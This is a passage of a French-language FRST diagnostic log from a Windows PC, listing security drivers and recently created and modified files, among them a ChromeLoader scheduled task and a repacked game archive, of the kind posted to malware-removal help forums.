S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-20] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-20] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-20] (Microsoft Windows -> Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [2740480 2021-12-06] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2022-01-09 20:01 - 2022-01-09 20:04 - 000032261 _____ C:\Users\NzL_O\Desktop\FRST.txt
2022-01-09 20:00 - 2022-01-09 20:03 - 000000000 ____D C:\FRST
2022-01-09 19:59 - 2022-01-09 19:59 - 002311168 _____ (Farbar) C:\Users\NzL_O\Desktop\FRST64.exe
2022-01-08 02:09 - 2020-03-28 16:31 - 000000000 ____D C:\Users\NzL_O\Desktop\Yu-Gi-Oh.Legacy.of.the.Duelist.Link.Evolution
2022-01-07 22:25 - 2022-01-07 22:26 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\Goldberg SteamEmu Saves
2022-01-07 21:55 - 2022-01-07 22:21 - 1934954865 _____ C:\Users\NzL_O\Desktop\Yu-Gi-Oh-Legacy-of-the-Duelist-Link-Evolution-Repack-Games.com.rar
2022-01-07 21:00 - 2022-01-07 21:00 - 000000000 ____D C:\Users\NzL_O\AppData\Local\chrome
2022-01-07 20:58 - 2022-01-07 20:58 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
2021-12-28 16:37 - 2021-12-28 16:37 - 000000000 ____D C:\Users\NzL_O\AppData\Local\UnrealEngineLauncher
2021-12-28 16:37 - 2021-12-28 16:37 - 000000000 ____D C:\Users\NzL_O\AppData\Local\UnrealEngine
2021-12-28 16:37 - 2021-12-28 16:37 - 000000000 ____D C:\Users\NzL_O\AppData\Local\Epic Games
2021-12-28 16:33 - 2021-12-28 16:33 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2021-12-28 16:33 - 2021-12-28 16:33 - 000001258 _____ C:\Users\Public\Desktop\Epic Games Launcher.lnk
2021-12-28 16:32 - 2021-12-28 16:41 - 000000000 ____D C:\ProgramData\Epic
2021-12-28 16:32 - 2021-12-28 16:36 - 000000000 ____D C:\Program Files (x86)\Epic Games
2021-12-28 16:30 - 2021-12-28 16:31 - 157548544 _____ C:\Users\NzL_O\Downloads\EpicInstaller-13.0.0.msi
2021-12-28 14:35 - 2021-12-28 14:36 - 747242006 _____ C:\Users\NzL_O\Desktop\CSS Game Content.zip
2021-12-24 00:12 - 2021-12-24 00:12 - 000000000 ____D C:\WINDOWS\SystemTemp
2021-12-23 13:17 - 2021-12-23 13:17 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe
2021-12-23 13:17 - 2021-12-23 13:17 - 000011979 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-12-23 13:15 - 2021-12-23 13:15 - 000272384 _____ C:\WINDOWS\system32\TpmTool.exe
2021-12-23 13:15 - 2021-12-23 13:15 - 000162816 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-12-23 11:12 - 2021-12-23 11:12 - 000000000 ___HD C:\$WinREAgent
2021-12-20 14:40 - 2021-12-20 14:40 - 000003540 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d7df244531b216
2021-12-20 14:37 - 2021-12-20 14:37 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1677540230-3073805055-3309549447-1001
==================== Un mois (modifiés) ==================
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2022-01-09 19:51 - 2021-11-14 14:39 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-09 19:49 - 2021-11-15 14:03 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\discord
2022-01-09 19:48 - 2021-11-15 14:02 - 000000000 ____D C:\Users\NzL_O\AppData\Local\Discord
2022-01-09 19:48 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-09 11:55 - 2021-11-15 19:39 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\.PixelmonUltra
2022-01-09 11:07 - 2021-11-14 15:40 - 000000000 ____D C:\Program Files (x86)\Steam
2022-01-09 10:38 - 2021-11-19 02:16 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\Blitz
2022-01-09 10:36 - 2021-11-19 02:17 - 000000032 _____ C:\Users\NzL_O\AppData\Roaming\.machineId
2022-01-09 10:35 - 2021-11-14 14:34 - 000000000 ___RD C:\Users\NzL_O\OneDrive
2022-01-09 10:34 - 2021-11-14 14:48 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2022-01-09 10:34 - 2021-11-14 14:29 - 000000000 __SHD C:\Users\NzL_O\IntelGraphicsProfiles
2022-01-09 07:42 - 2021-11-21 23:04 - 000000000 ____D C:\Users\NzL_O
2022-01-09 01:51 - 2021-11-21 22:58 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-01-08 13:22 - 2021-11-21 23:14 - 001770906 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-01-08 13:22 - 2019-12-07 15:49 - 000792842 _____ C:\WINDOWS\system32\perfh00C.dat
2022-01-08 13:22 - 2019-12-07 15:49 - 000149972 _____ C:\WINDOWS\system32\perfc00C.dat
2022-01-08 13:22 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2022-01-08 13:14 - 2021-11-21 23:26 - 000004028 _____ C:\WINDOWS\system32\Tasks\Avast SecureLine VPN Update
2022-01-08 13:14 - 2021-11-21 23:26 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-01-08 13:14 - 2021-11-17 15:37 - 000000000 ____D C:\Program Files\TeamViewer
2022-01-08 13:13 - 2021-11-21 22:57 - 000008192 ___SH C:\DumpStack.log.tmp
2022-01-06 21:47 - 2021-11-14 14:20 - 000002446 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-01-06 21:47 - 2021-11-14 14:20 - 000002284 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-01-06 21:47 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-01-06 21:47 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-01-05 19:26 - 2021-11-14 14:41 - 000002249 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-01-05 19:26 - 2021-11-14 14:41 - 000002208 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-01-05 10:47 - 2015-07-16 04:32 - 000000000 ____D C:\ProgramData\AVAST Software
2022-01-05 10:46 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-12-28 17:49 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-12-28 16:41 - 2021-11-15 16:27 - 000000000 ____D C:\Users\NzL_O\AppData\Local\D3DSCache
2021-12-28 16:41 - 2021-11-14 14:32 - 000000000 ____D C:\Users\NzL_O\AppData\Local\NVIDIA Corporation
2021-12-28 16:40 - 2016-04-14 12:02 - 000000000 ____D C:\ProgramData\Package Cache
2021-12-28 16:37 - 2021-11-19 02:17 - 000000000 ____D C:\Users\NzL_O\AppData\Local\EpicGamesLauncher
2021-12-24 00:15 - 2021-11-21 22:57 - 000266808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-12-23 13:49 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\servicing
2021-12-23 13:49 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-12-23 11:09 - 2021-11-15 02:19 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-12-23 11:00 - 2021-11-15 02:19 - 137938848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-12-21 06:37 - 2021-11-14 15:40 - 000001040 _____ C:\Users\Public\Desktop\Steam.lnk
2021-12-20 19:51 - 2021-11-16 19:24 - 000000000 ____D C:\Users\NzL_O\AppData\Local\ElevatedDiagnostics
2021-12-20 19:39 - 2015-07-16 04:34 - 000000000 ____D C:\ProgramData\McAfee
2021-12-20 19:03 - 2021-11-14 15:11 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-12-20 19:03 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-12-20 18:55 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-12-20 16:55 - 2021-12-06 22:07 - 000000000 ____D C:\Users\NzL_O\AppData\Local\GameAnalytics
2021-12-20 16:51 - 2021-11-14 15:46 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2021-12-20 14:40 - 2021-11-21 23:26 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-12-14 17:15 - 2021-11-14 23:23 - 000036120 _____ (Avast Software) C:\WINDOWS\system32\icarus_rvrt.exe
==================== Fichiers à la racine de certains dossiers ========
2021-11-19 02:17 - 2022-01-09 10:36 - 000000032 _____ () C:\Users\NzL_O\AppData\Roaming\.machineId
==================== SigCheck ============================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
==================== Fin de FRST.txt ========================